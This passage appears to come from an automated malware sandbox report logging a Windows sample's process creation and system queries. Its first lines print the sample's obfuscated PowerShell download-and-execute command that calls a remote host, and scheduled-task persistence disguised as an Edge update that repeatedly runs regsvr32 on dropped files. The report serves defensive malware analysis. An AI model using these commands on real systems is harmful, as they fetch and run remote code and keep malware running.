Source: C:\Windows\System32\OpenWith.exe Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpshare.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/miek.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{808ccc00-48cc-4040-c488-c044888cccc0}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/u0ow.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c88c8848-c040-4888-c800-c800848c4848}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/miek.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{808ccc00-48cc-4040-c488-c044888cccc0}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/u0ow.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{c88c8848-c040-4888-c800-c800848c4848}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files\Windows Media Player\wmpshare.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmpshare.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
